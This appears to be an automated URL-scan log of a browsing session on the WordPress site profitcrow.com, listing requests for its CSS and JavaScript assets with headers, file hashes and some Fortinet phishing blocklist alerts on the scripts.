cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:03 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 259
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   259
Md5:    49736e2d926fb2846e2df8fc0a1b69f8
Sha1:   0c415addd3603df8843209de4fc448ef5c443761
Sha256: be091ce2d9948f24a59c9d1578557cd92e8180e2318dc0a21308ca180071f8d0
                                        
                                            GET /wp-content/plugins/video-popup/css/vp-close-icon/close-button-icon.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 279
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   279
Md5:    72bfd2d53aa9f299cf392abd69c8b8a6
Sha1:   7f487186ce33a2d1bc60b007c342bd0747cc472c
Sha256: a7bd064a03209d5852f6dbb767df00cac08962728ed8b961b6cba1e465e54d27
                                        
                                            GET /wp-content/plugins/stripe-payments/public/assets/css/public.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:32:36 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1195
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1195
Md5:    3d213908fe5fb6d51972c9576cb70afa
Sha1:   ee9d05f6948729e9b35456f06072ffa155e5e6d9
Sha256: 404082f0c1289d8b45211b55e2967db60d7654f2277bec1adab2dec5a3926edf
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:08:51 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3554
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (18854)
Size:   3554
Md5:    23d0cda7fbd7f269a200dfff8ee211c6
Sha1:   497cc19819270e7a3795ab61e775c130ac7b255a
Sha256: 299d22db4a8362551089748bb93645f190469be3b392fa206b9872bd298bb41b
                                        
                                            GET /wp-content/uploads/elementor/css/custom-frontend-lite.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 12:02:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 11467
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   11467
Md5:    de0a3b4cfa50c6250fcae2e841d308c1
Sha1:   de881601ebbc86cc3edb2d4d19c8ccf4bd66f010
Sha256: a0992c4ef90ba89f416113c0c6dc897444a76c14b55cd3c57a7caf09f3680160
                                        
                                            GET /wp-content/uploads/elementor/css/post-5.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 11:59:50 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 338
date: Fri, 25 Nov 2022 22:08:03 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1494), with no line terminators
Size:   338
Md5:    a38833649aee38c839e70c45cf77eab9
Sha1:   531456a09a87cb4cb4ee40794c978c9437aadd34
Sha256: bf0f7b2aea27e7889940c290bb6f361261def31415057f4f8119163197d834b3
                                        
                                            GET /wp-content/uploads/hummingbird-assets/62c5bd855a07086694cec358dc8b97dd.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
x-powered-by: PHP/7.2.34
cache-control: max-age=3600, must-revalidate
hummingbird-cache: Served
content-length: 1138
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text
Size:   1138
Md5:    771b7d38176d4117a8677c87c91ac101
Sha1:   90f425477018085cc060415c19b08c33550e5b26
Sha256: 6fceca53b30ff562d7d1ad0c6745fde650d08301e33fefdda37be0447c6e0c6b
                                        
                                            GET /wp-includes/js/jquery/jquery.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 04 Nov 2022 18:13:57 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 32486
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (57404)
Size:   32486
Md5:    079bd18335ced970c278ca67bdd02a1c
Sha1:   17899d62843cb4cb5fe067675a82e34e389d7066
Sha256: 1a92b908c7efe886b48fa7ace0384525069dab0c585f85550fe9799f0a12fe00

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 12 Sep 2022 14:53:32 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 6175
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11834)
Size:   6175
Md5:    ad9a0acc74d703c631bd588a2a25174d
Sha1:   97c071258f83682d3f70e1c81472a27c52c2b09d
Sha256: 19e727fa70ff2d98e4a3ffd33c44394f22c36d6b214d06c77205e29cba3660f7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/video-popup/js/YouTubePopUp.jquery.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 04 Nov 2022 18:13:56 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 3248
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (7928), with CRLF, LF line terminators
Size:   3248
Md5:    fb83d91c4a414177379f38716d6c1809
Sha1:   2a591fa08f588a6142ae1e915321893083473be5
Sha256: ab0edcd305fc0f7ec923979e31ae5f3df3a74698e35041396a4d38cee1df9496

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/video-popup/js/YouTubePopUp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Tue, 11 Jan 2022 12:22:43 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1545
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with CRLF, LF line terminators
Size:   1545
Md5:    0852648646af5f4c849b2fde4c32c567
Sha1:   4ad1becf8162081e8c11c8d6f68f88c3c87b59cd
Sha256: 866f1fa457b3ebe98585a1121e8e85e8b80e7573cb39d3ee217613fa2a51add5

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stock-market-ticker/assets/stockdio-wp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 27 Dec 2021 10:39:44 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4254
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6787), with CRLF, LF line terminators
Size:   4254
Md5:    8dda53a0928c12064eda9228d1b4c83e
Sha1:   d9a390405841546929ea86f0e39777cd4f716c86
Sha256: 7c4d0111ce008644fd69861203496ea4404f29b109e6c322f291465933c3d007

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/plugins/stockdio-historical-chart/assets/stockdio_chart_historical-wp.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 27 Dec 2021 10:24:24 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4260
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6787), with CRLF, LF line terminators
Size:   4260
Md5:    e2cb082d3a8b14ed950ba26da1e62614
Sha1:   4204ec21dcb7078d0651206b23b6919efea98217
Sha256: 36ae889e9de9dfba52c44151e1f5178e991fadfb57194df3435a3f5caf495dd6

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.249
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "6022132A52444BDE22CF48DA37C6384FC07EDF18E0EF6AFB05FBE715A9ADB8F3"
Last-Modified: Thu, 24 Nov 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Sat, 26 Nov 2022 04:08:04 GMT
Date: Fri, 25 Nov 2022 22:08:04 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/themes/profitcrow/pagination.js HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: application/javascript
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 29 Dec 2021 12:11:08 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2323
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document, ASCII text, with CRLF, LF line terminators
Size:   2323
Md5:    282e81c5dc42399f44033b488ecf3f15
Sha1:   da4c08cb9a36f751e45ba244f4f33fe9315dad3c
Sha256: 568de54b6ab279b0b6c18d267028eddfef996ee8538886bd07dc08bd17ecfd80

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /wp-content/uploads/elementor/css/global.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 12:02:22 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1274
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (6697)
Size:   1274
Md5:    fc6edda31e164cee7091e25022bf94dd
Sha1:   689541cb538ad30d128ed13bfdded51fad82d3e8
Sha256: 704545d1d0d5ef3cc50b0cb5301da68ff6669f1cf1a734b05be20f8198a24530
                                        
                                            GET /wp-content/uploads/elementor/css/post-6.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Sat, 02 Apr 2022 09:31:25 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2376
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27484), with no line terminators
Size:   2376
Md5:    4f4bcac502200ba217a1be604293d1a3
Sha1:   06d56236cdec9f49e3b84594b1b8daf58367eb37
Sha256: cbe9d9b56f6ec932e87ab0279b0c85badb01c3739b2848a9e2d3bf58513d806e
                                        
                                            GET /wp-content/uploads/elementor/css/post-8.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 21 Mar 2022 05:11:17 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 597
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (1769)
Size:   597
Md5:    3e7491096c099cda879eb7fabf1fd4d2
Sha1:   4e1b0a8a39c9f7fed39297e7224425d4ac8fa0ae
Sha256: c84494234c88ac816adedaf41cc2b81632d90f027920fd0bf2b98ea79edb9e64
                                        
                                            GET /wp-content/uploads/elementor/css/post-66.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 28 Mar 2022 10:38:18 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 1099
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (9093), with no line terminators
Size:   1099
Md5:    c091095a23032852d0fb1e3b99c68061
Sha1:   090ecb4cdab14e79a8c1fcce9a50440c9105b191
Sha256: bde4854b85bcc99dd3785e0589f4ea9b3368620d84c992b38a48a5f5dfd0c83d
                                        
                                            GET /wp-content/themes/profitcrow/style.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Fri, 11 Mar 2022 05:54:28 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 4226
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   4226
Md5:    d7e88376bb05c54b033792ab7f6f513b
Sha1:   3ffaf2240fbbf738e7727ba1fd23e83dcd50987f
Sha256: 0d1923b7fc22037ddbafa26ffc8a91264fb08716aacccfb9960eb2ba67cbebb7
                                        
                                            GET /wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Thu, 23 Dec 2021 05:09:26 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 7374
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (1646)
Size:   7374
Md5:    806afc62d640eb03fccbd5fe46ed8666
Sha1:   31259bb9e403fbe379125ea0c562ac11d76dc4d7
Sha256: f7ceb3661377e98e71ccebe4d91336ac77e4e62a84bff79a1e6f865f3d00c26f
                                        
                                            GET /wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Wed, 30 Sep 2020 01:23:06 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 2394
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (11256), with no line terminators
Size:   2394
Md5:    ce94f62588d05264ac0148712111cb11
Sha1:   518bcd922f54169aeb199c0ccbc5877165ac218e
Sha256: 84ab658a69c39f424be0b27f61d612447d01606fce33beb962cbea53627d8c81
                                        
                                            GET /wp-content/themes/twentytwentyone/style.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         162.213.255.22
HTTP/2 200 OK
content-type: text/css
                                        
cache-control: public, max-age=604800
expires: Fri, 02 Dec 2022 22:08:04 GMT
last-modified: Mon, 19 Jul 2021 00:45:00 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 21920
date: Fri, 25 Nov 2022 22:08:04 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Unicode text, UTF-8 text, with very long lines (403)
Size:   21920
Md5:    62daf70bcac352a086ee7c6c0498068e
Sha1:   c8d6502c4f964874a0016223cf246e1dd81528e7
Sha256: f15ba3c042055ec36a3714964cce47932b19c5f428e696d4630225c315944e31
                                        
                                            GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css HTTP/1.1 
Host: profitcrow.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://profitcrow.com/
Cookie: asp_transient_id=b55c59711187fa4d9e4b9e7ec796e447
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
